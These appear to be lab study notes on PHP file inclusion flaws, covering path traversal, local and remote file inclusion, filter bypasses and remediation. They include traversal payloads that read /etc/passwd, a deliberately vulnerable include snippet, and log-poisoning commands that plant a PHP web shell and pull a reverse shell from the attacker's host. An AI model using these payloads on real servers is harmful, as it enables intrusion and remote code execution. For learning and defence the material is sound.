In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input.
Table of contents:
Path Traversal
Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application.
LFI attacks against web applications are often due to a developers' lack of security awareness. With PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications. LFI exploits follow the same concepts as path traversal.
Scenario (1):
Suppose the web application provides two languages, and the user can select between the EN and AR:
<?PHP
include($_GET["lang"]);
?>
The PHP code above uses a GET request via the URL parameter lang to include the file of the page.
Theoretically, we can access and display any readable file on the server from the code above if there isn't any input validation.
Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.
By adding the Null Byte at the end of the payload, we tell the include function to ignore anything after the null byte which may look like:
include("languages/../../../../../etc/passwd%00").".php");
**Use the URL bar!**
lab3.php?file=/../../../../etc/passwd%00
NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above.
Bypass filter trough more slashes
Next, in the following scenarios, the developer starts to use input validation by filtering some keywords. Let's test out and check the error message!
Warning: include(languages/etc/passwd): failed to open stream: No such file or directory in /var/www/html/THM-5/index.php on line 15
f we check the warning message in the include(languages/etc/passwd) section, we know that the web application replaces the ../ with the empty string.
First, we can send the following payload to bypass it:
....//....//....//....//....//etc/passwd
$_REQUESTS
$_REQUEST is a super global variable which is widely used to collect data after submitting html forms. Now in contact. php we can collect the data entered by the user in different fields using $_RQUEST. You can try to send a POST request instead of a GET request in order to get FI!
Remote File Inclusion - RFI
Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function. One requirement for RFI is that the allow_url_fopen option needs to be on.
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
Sensitive Information Disclosure
Cross-site Scripting (XSS)
Denial of Service (DoS)
http://10.9.159.250/php-reverse-shell.php
LFI to RCE using apache log poisoning
Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log
Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log&c=id
OR
python -m SimpleHTTPServer 9000
Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>"
file_put_contents('shell.php') // What it will be saved locally on the target
file_get_contents('http://<local_ip>:9000/shell-php-rev.php') // Where is the shell on YOUR pc and WHAT is it called
Execute PHP Reverse Shell: http//10.10.10.10/shell.php
Remedation
As a developer, it's important to be aware of web application vulnerabilities, how to find them, and prevention methods. To prevent the file inclusion vulnerabilities, some common suggestions include:
Keep system and services, including web application frameworks, updated with the latest version.
Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, such as allow_url_fopen on and allow_url_include.
Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.
Never trust user input, and make sure to implement proper input validation against file inclusion.
Implement whitelisting for file names and locations as well as blacklisting.
